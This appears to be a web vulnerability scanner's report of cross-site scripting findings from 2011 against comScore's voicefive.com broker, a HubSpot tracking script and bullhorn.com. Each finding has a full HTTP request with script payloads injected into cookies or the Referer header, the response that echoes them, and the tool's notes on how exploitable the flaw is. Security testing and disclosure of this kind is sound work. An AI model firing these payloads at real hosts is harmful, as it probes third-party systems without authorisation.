HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:15 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:15 2011&recExp=Mon Mar 7 01:34:15 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:15 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... c=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '190814<script>alert(1)</script>ea8192a8c04', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.co ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 70b52<script>alert(1)</script>13042405f64 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:21 2011&recExp=Mon Mar 7 01:34:21 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... okies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 85f4c<script>alert(1)</script>c1bc6726c37 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:18 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:18 2011&recExp=Mon Mar 7 01:34:18 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:18 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 ...[SNIP]...
The value of the ar_p39750809 cookie is copied into the HTML document as plain text between tags. The payload 35d00<script>alert(1)</script>d41022b86e5 was submitted in the ar_p39750809 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:09 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:09 2011&recExp=Mon Mar 7 01:34:09 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:09 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... eady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "U ...[SNIP]...
The value of the ar_p58096422 cookie is copied into the HTML document as plain text between tags. The payload 32276<script>alert(1)</script>892a2bb3012 was submitted in the ar_p58096422 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:07 2011&recExp=Mon Mar 7 01:34:07 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait% ...[SNIP]...
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c912d<script>alert(1)</script>bd186b7b654 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:11 2011&recExp=Mon Mar 7 01:34:11 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... Exp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload aaaa3<script>alert(1)</script>1725631997c was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:13 2011&recExp=Mon Mar 7 01:34:13 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 44454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p8 ...[SNIP]...
The value of the hubspotutk cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67955'-alert(1)-'d2c4667455a was submitted in the hubspotutk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /salog.js.aspx HTTP/1.1
Host: bullhorn.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.bullhorn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=mYIedAj8zAEkAAAANjA0ZDE2ZmItYWRmMi00NWQ0LTk2ZmEtMTZjNDMyYTFlYmM10; hubspotutk=14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a; HUBSPOT39=588321964.0.0000
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 08 Mar 2011 11:07:54 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 526
var hsUse20Servers = true; var hsDayEndsIn = 64325; var hsWeekEndsIn = 496325; var hsMonthEndsIn = 2051525; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-03-08 06:07:54"; var hsIsNewVisitor = 0; var hsFirstVisitValue = ""; var hsut = '14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a'; var hsVisitLogOff = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed6e'%3balert(1)//c8f3424fcee was submitted in the Referer HTTP header. This input was echoed as 2ed6e';alert(1)//c8f3424fcee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: bullhorn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2ed6e'%3balert(1)//c8f3424fcee
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Mar 2011 02:17:24 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
Location: http://www.bullhorn.com/
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53132
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9345'%3balert(1)//ea0a3ade1f5 was submitted in the Referer HTTP header. This input was echoed as d9345';alert(1)//ea0a3ade1f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /newsrelease-details.php HTTP/1.1
Host: bullhorn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d9345'%3balert(1)//ea0a3ade1f5